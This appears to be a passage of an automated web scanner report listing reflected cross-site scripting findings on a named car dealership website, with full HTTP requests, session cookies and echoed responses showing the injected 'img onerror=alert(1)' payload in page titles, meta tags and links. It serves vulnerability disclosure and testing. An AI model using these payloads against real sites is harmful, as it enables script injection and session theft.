<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota 4Runnerbbb8d ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota 4Runnerbbb8d"><img src=a onerror=alert(1)>212fce5c129 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota 4Runnerbbb8d"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 32d8e'><img%20src%3da%20onerror%3dalert(1)>f59e0d5d6d7 was submitted in the REST URL parameter 2. This input was echoed as 32d8e'><img src=a onerror=alert(1)>f59e0d5d6d7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/4Runner32d8e'><img%20src%3da%20onerror%3dalert(1)>f59e0d5d6d7/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:37:03 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:37:04 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:37:04 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16240
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota 4Runner32d8e ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=4Runner32d8e'><img src=a onerror=alert(1)>f59e0d5d6d7'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7297a'><img%20src%3da%20onerror%3dalert(1)>f6d145712fc was submitted in the REST URL parameter 2. This input was echoed as 7297a'><img src=a onerror=alert(1)>f6d145712fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Avalon7297a'><img%20src%3da%20onerror%3dalert(1)>f6d145712fc/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:28:09 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:28:10 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:28:10 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16209
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Avalon7297a' ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Avalon7297a'><img src=a onerror=alert(1)>f6d145712fc'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30a9e"><img%20src%3da%20onerror%3dalert(1)>81eae16f5ef was submitted in the REST URL parameter 2. This input was echoed as 30a9e"><img src=a onerror=alert(1)>81eae16f5ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Avalon30a9e"><img%20src%3da%20onerror%3dalert(1)>81eae16f5ef/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:24:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:24:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:24:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16217
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Avalon30a9e" ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Avalon30a9e"><img src=a onerror=alert(1)>81eae16f5ef at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Avalon30a9e"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 14883<img%20src%3da%20onerror%3dalert(1)>594a57e680f was submitted in the REST URL parameter 2. This input was echoed as 14883<img src=a onerror=alert(1)>594a57e680f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Avalon14883<img%20src%3da%20onerror%3dalert(1)>594a57e680f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:30:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:30:58 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:30:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16133
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Avalon14883< ...[SNIP]... <H1> Toyota Avalon14883<img src=a onerror=alert(1)>594a57e680f</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 72280'><img%20src%3da%20onerror%3dalert(1)>c367e29e206 was submitted in the REST URL parameter 2. This input was echoed as 72280'><img src=a onerror=alert(1)>c367e29e206 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry%20Hybrid72280'><img%20src%3da%20onerror%3dalert(1)>c367e29e206/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:07:23 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:07:23 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:07:24 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16331
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry Hybrid ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Camry Hybrid72280'><img src=a onerror=alert(1)>c367e29e206'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c15b2"><img%20src%3da%20onerror%3dalert(1)>0fa20d7baa7 was submitted in the REST URL parameter 2. This input was echoed as c15b2"><img src=a onerror=alert(1)>0fa20d7baa7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry%20Hybridc15b2"><img%20src%3da%20onerror%3dalert(1)>0fa20d7baa7/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:05:16 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:05:17 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:05:17 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16351
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry Hybrid ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Camry Hybridc15b2"><img src=a onerror=alert(1)>0fa20d7baa7 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Camry Hybridc15b2"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2c00b<img%20src%3da%20onerror%3dalert(1)>ce532d4f48e was submitted in the REST URL parameter 2. This input was echoed as 2c00b<img src=a onerror=alert(1)>ce532d4f48e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry%20Hybrid2c00b<img%20src%3da%20onerror%3dalert(1)>ce532d4f48e/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:10:18 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:10:19 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:10:19 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16300
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry Hybrid ...[SNIP]... <H1> Toyota Camry Hybrid2c00b<img src=a onerror=alert(1)>ce532d4f48e</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b74e7'><img%20src%3da%20onerror%3dalert(1)>afe90221fb7 was submitted in the REST URL parameter 2. This input was echoed as b74e7'><img src=a onerror=alert(1)>afe90221fb7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camryb74e7'><img%20src%3da%20onerror%3dalert(1)>afe90221fb7/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:01:12 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:01:12 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:01:13 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16154
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camryb74e7'> ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Camryb74e7'><img src=a onerror=alert(1)>afe90221fb7'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4795"><img%20src%3da%20onerror%3dalert(1)>6425f289dbd was submitted in the REST URL parameter 2. This input was echoed as b4795"><img src=a onerror=alert(1)>6425f289dbd in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camryb4795"><img%20src%3da%20onerror%3dalert(1)>6425f289dbd/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:59:36 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:59:36 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:59:37 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16160
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camryb4795"> ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Camryb4795"><img src=a onerror=alert(1)>6425f289dbd at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Camryb4795"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3d55c<img%20src%3da%20onerror%3dalert(1)>20edf5fdc7f was submitted in the REST URL parameter 2. This input was echoed as 3d55c<img src=a onerror=alert(1)>20edf5fdc7f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Camry3d55c<img%20src%3da%20onerror%3dalert(1)>20edf5fdc7f/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 04:02:39 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 04:02:39 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 04:02:40 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16103
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Camry3d55c<i ...[SNIP]... <H1> Toyota Camry3d55c<img src=a onerror=alert(1)>20edf5fdc7f</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 43619<img%20src%3da%20onerror%3dalert(1)>17d781dc16a was submitted in the REST URL parameter 2. This input was echoed as 43619<img src=a onerror=alert(1)>17d781dc16a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Corolla43619<img%20src%3da%20onerror%3dalert(1)>17d781dc16a/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:53:57 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:53:57 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:53:58 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16186
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Corolla43619 ...[SNIP]... <H1> Toyota Corolla43619<img src=a onerror=alert(1)>17d781dc16a</H1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6a409"><img%20src%3da%20onerror%3dalert(1)>188bcadadfe was submitted in the REST URL parameter 2. This input was echoed as 6a409"><img src=a onerror=alert(1)>188bcadadfe in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Corolla6a409"><img%20src%3da%20onerror%3dalert(1)>188bcadadfe/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:51:01 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:51:01 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:51:02 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16215
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Corolla6a409 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota Corolla6a409"><img src=a onerror=alert(1)>188bcadadfe at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota Corolla6a409"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aaf09'><img%20src%3da%20onerror%3dalert(1)>f245537bdff was submitted in the REST URL parameter 2. This input was echoed as aaf09'><img src=a onerror=alert(1)>f245537bdff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/Corollaaaf09'><img%20src%3da%20onerror%3dalert(1)>f245537bdff/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:52:27 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:52:27 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:52:28 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16245
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota Corollaaaf09 ...[SNIP]... <a href='/quick-quote.html?year=&make=Toyota&model=Corollaaaf09'><img src=a onerror=alert(1)>f245537bdff'> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36516"><img%20src%3da%20onerror%3dalert(1)>9efc5213980 was submitted in the REST URL parameter 2. This input was echoed as 36516"><img src=a onerror=alert(1)>9efc5213980 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /Toyota/FJ%20Cruiser%204x236516"><img%20src%3da%20onerror%3dalert(1)>9efc5213980/ HTTP/1.1 Host: www.fremonttoyota.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=198428792.1291762386.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=v8g9p8mq0ejk18m1jtpubu81s4; __utma=198428792.1988978089.1291762386.1291762386.1291762386.1; __utmc=198428792; __utmb=198428792; BIGipServerAPACHE_DEV=2936078602.20480.0000;
Response
HTTP/1.1 200 OK Date: Wed, 08 Dec 2010 03:37:20 GMT Server: Apache/2.2.14 (Ubuntu) DAV/2 PHP/5.3.2-1ubuntu4.5 with Suhosin-Patch mod_perl/2.0.4 Perl/v5.10.1 X-Powered-By: PHP/5.3.2-1ubuntu4.5 Set-Cookie: SOURCE=SEO; expires=Sat, 03-Dec-2011 03:37:20 GMT; path=/ Cache-Control: max-age=1 Expires: Wed, 08 Dec 2010 03:37:21 GMT Vary: Accept-Encoding,User-Agent P3P: CP="NOI DEVa TAIa OUR BUS UNI" Connection: close Content-Type: text/html Content-Length: 16409
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <HEAD> <TITLE> Toyota FJ Cruiser 4 ...[SNIP]... <META NAME=DESCRIPTION CONTENT=" Toyota FJ Cruiser 4x236516"><img src=a onerror=alert(1)>9efc5213980 at Fremont Toyota '' 5851 Cushing Parkway, Fremont, CA 94538 Come here for a price quote today. You won't be let down. We also carry Toyota FJ Cruiser 4x236516"> ...[SNIP]...
